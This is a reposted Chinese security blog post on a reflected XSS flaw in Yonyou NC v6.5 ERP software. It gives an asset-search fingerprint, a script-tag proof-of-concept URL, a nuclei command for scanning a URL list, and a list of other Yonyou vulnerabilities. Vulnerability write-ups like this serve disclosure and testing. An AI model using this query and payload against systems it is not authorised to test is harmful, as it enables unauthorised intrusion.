用友nc v6.5 反射型xss nuclei

admin
admin
admin
101066
文章
87
评论
2022年10月5日12:07:59评论347 views字数 971阅读3分14秒阅读模式
用友nc v6.5 反射型xss nuclei
文章声明

安全文章技术仅供参考,此文所提供的信息为漏洞靶场进行渗透,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。
本文所提供的工具仅用于学习,禁止用于其他,未经授权,严禁转载,如需转载私信联系。



用友nc v6.5 反射型xss nuclei


文章简介


用友网络科技股份有限公司是亚太本土管理软件ERP软件、集团管理软件、人力资源管理软件、客户关系管理软件、小型企业管理软件、财政及行政事业单位管理软件、汽车行业管理软件、烟草行业管理软件、内部审计软件及服务提供商,也是中国领先的企业云服务、医疗卫生信息化、管理咨询及管理信息化人才提供商。



网络测绘

app="用友-UFIDA-NC"


演复过程

首页

用友nc v6.5 反射型xss nuclei

poc:
/uapws/pages/error.jsp?msg=<script>alert(1)</script>

用友nc v6.5 反射型xss nuclei




nuclei-pocs

nuclei -t yonyou_NC-uapws-xss.yaml -l url.txt


北极星sec公众号回复1003获取

用友nc v6.5 反射型xss nuclei




用友漏洞待更新记录(已更新14)

  • 用友 U8 OA test.jsp SQL注入漏洞

  • 用友nc v6.5 远程命令执行漏洞(CNVD-2021-30167)

  • 用友 畅捷通T+ DownloadProxy.aspx 任意文件读取漏洞

  • 用友 畅捷通T+ RecoverPassword.aspx 管理员密码修改漏洞

  • 用友 畅捷通T+ Upload.aspx 任意文件上传漏洞

  • 用友 U8 OA getSessionList.jsp 敏感信息泄漏漏洞

  • 用友 NC NCFindWeb 任意文件读取漏洞

  • 用友 GRP-U8 Proxy SQL注入 CNNVD-201610-923

  • 用友 GRP-U8 UploadFileData 任意文件上传漏洞 

  • 用友 FE协作办公平台 templateOfTaohong_manager.jsp 目录遍历漏洞

  • 用友nc 控制台绕过漏洞

  • 用友 NC 系统 uapws wsdl XXE(2022hw) 

  • 用友时空KSOA软件前台文件上传漏洞(2022hw)

  • 用友nc v6.5 反射型xss

  • 用友 NCCloud FS文件管理SQL注入

  • 用友nc v6.5 反序列化漏洞 补丁绕过

  • 用友nc v6.5 反序列化漏洞

  • 用友nc v6.5 前台任意文件上传漏洞

  • (CNVD-2021-37786)用友nc Cloud FS 文件管理系统 任意账户登录漏洞

  • 用友nc IUFO v5






用友nc v6.5 反射型xss nuclei




用友nc v6.5 反射型xss nuclei

用友nc v6.5 反射型xss nuclei

用友nc v6.5 反射型xss nuclei



原文始发于微信公众号(北极星sec):用友nc v6.5 反射型xss nuclei

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年10月5日12:07:59
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   用友nc v6.5 反射型xss nucleihttp://cn-sec.com/archives/1331156.html

发表评论

匿名网友 填写信息